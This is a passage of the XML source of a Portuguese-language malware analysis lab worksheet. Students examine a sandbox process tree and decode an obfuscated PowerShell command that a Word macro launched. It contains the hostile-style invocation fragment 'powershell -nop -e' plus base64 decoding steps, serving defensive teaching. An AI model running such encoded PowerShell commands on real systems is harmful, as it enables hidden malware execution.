          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>A área de trabalho mostrada consiste em uma série de capturas de tela da área de trabalho em diferentes estágios do processo de infecção por malware. Passe o mouse sobre a imagem e mova o mouse para a direita ou esquerda para percorrer as capturas de tela. Em muitos casos, não há nada para ver, pois o malware não exibe nada na tela enquanto funciona. Às vezes, se a entrada do usuário for necessária para executar o malware, em vez de uma captura de tela, você poderá ver um filme que captura as ações do usuário que foram conduzidas como parte do processo de infecção do malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3D4285" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Pergunta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122DDF61" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Revise as telas do início ao fim. Pelo que você vê nas telas, qual parece ser a primeira parte do processo de infecção por vírus?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0736D7A4" w14:textId="6F111103" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFB7575" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>b.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>No lado direito da tela, você verá a árvore de processo que exibe um grupo de barras horizontais em uma estrutura aninhada em forma de árvore. Esta é uma árvore de processos. Ele mostra todos os processos de software que foram usados na exploração. Alguns deles são componentes de software do Windows e outros fazem parte do malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D60344" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>c.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Clique no primeiro processo na árvore. As informações sobre esse processo aparecem abaixo da árvore. Clique no botão </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Mais informações</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> para ver mais detalhes sobre o processo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3748018C" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Perguntas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60703A63" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Que processo é esse?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E11B4BB" w14:textId="7CC6A010" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7266A">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384F639E" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Observe a linha de comando. Qual arquivo foi passado como argumento para o comando que executa o MS Word?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B9BCDF" w14:textId="6AF78F4E" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8F64A4" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Qual papel você acha que esse arquivo de documento teve na exploração de malware? Sinta-se à vontade para pesquisar a resposta na Web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDC2E8C" w14:textId="3641892A" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F28839" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00C7266A" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7266A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Etapa 4: Analisar um script ofuscado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2460EAF8" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Feche a janela </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Mais informações</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> clicando no "x" no canto superior direito. Clique no processo imediatamente abaixo do processo do MS Word. Clique em </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Mais informações</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> para visualizar os detalhes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3522F407" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Perguntas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F87268" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Qual é o nome do processo? Qual é o seu propósito?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403D30CF" w14:textId="0B37E468" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06863EA2" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>O PowerShell é frequentemente usado por agentes de ameaças em ataques de vida fora da terra (LotL). O que é um ataque de LotL e como o PowerShell permite esses ataques? Use a Internet para procurar respostas conforme necessário.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DC67AB" w14:textId="7A421C94" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F81FA64" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>b.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Na janela </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Detalhes Avançados do Processo</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> (mais informações), observe a entrada de linha de comando. Este é o comando emitido pela macro de malware no documento do Word. Vocês podem ver o </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> e dois argumentos que foram passados para o comando, e a sequência longa que vimos </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286F9E21" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>c.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Copie a sequência usando o ícone de cópia ao lado do título </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Linha de comando</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D121C9F" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>d.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">IAbra um terminal para salvar o texto copiado em um arquivo de texto chamado </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> com o comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">. O </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>texto</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> do nome do arquivo é usado como exemplo para esta atividade.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE0E84A" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">cisco@labvm:~$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>echo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>conteúdo de texto copiado</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>” &gt; text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413C2145" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">em que "conteúdo de texto copiado" é o comando do </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD52B5C" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>e.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">Abra o arquivo de </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>texto</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizando um editor de texto. Um editor de texto baseado em GUI, Pluma, está disponível nesta VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EED335A" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>f.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">No arquivo de </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>texto</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">, remova a cadeia, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>powershell -nop -e</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>. Sakve e feche o arquivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD7CFC0" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>g.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">No terminal, use o comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">-d </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">para decodificar os dados binários como texto e a saída é canalizada para um novo arquivo de texto, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>text_64</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">. O nome do arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>text_64</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve"> é usado como exemplo para esta atividade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E49BA3D" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cisco@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>labvm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cat text | base64 -d &gt; text_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7A868E" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>h.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">No Pluma, abra o arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>text_</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
